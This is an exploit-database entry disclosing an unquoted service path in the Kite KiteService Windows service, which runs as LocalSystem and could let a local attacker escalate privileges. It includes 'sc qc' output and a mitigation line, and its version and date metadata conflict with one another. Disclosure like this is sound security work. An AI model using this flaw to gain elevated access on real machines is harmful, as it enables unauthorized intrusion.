header-logo
Suggest Exploit
vendor:
Kite
by:
Ghaleb Al-otaibi
7.2
CVSS
HIGH
Unquoted Service Path
73
CWE
Product Name: Kite
Affected Version From: Version 4.2.0.1 U1
Affected Version To: Version 4.2.0.1 U1
Patch Exists: NO
Related CWE:
CPE: a:kite:kite:1.2021.610.0
Metasploit:
Other Scripts:
Platforms Tested: Microsoft Windows 10 Pro - 10.0.19044 N/A Build 19044
2020

Kite 1.2021.610.0 – Unquoted Service Path

KiteService is a Windows service installed with Kite 1.2021.610.0. The service is configured to run with the LocalSystem account and has an unquoted service path. This can be exploited by a local attacker to gain elevated privileges.

Mitigation:

Ensure that all services have a fully qualified path with quotes around it.
Source

Exploit-DB raw data:

# Exploit Title: Kite 1.2021.610.0 - Unquoted Service Path
# Date: 2020-11-6
# Exploit Author: Ghaleb Al-otaibi
# Vendor Homepage: https://www.kite.com/
# Version: Version 4.2.0.1 U1
# Tested on: Microsoft Windows 10 Pro - 10.0.19044 N/A Build 19044
# CVE : NA

# Service info:
C:\Windows\system32\cmd.exe>sc qc KiteService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: KiteService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files\Kite\KiteService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : KiteService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem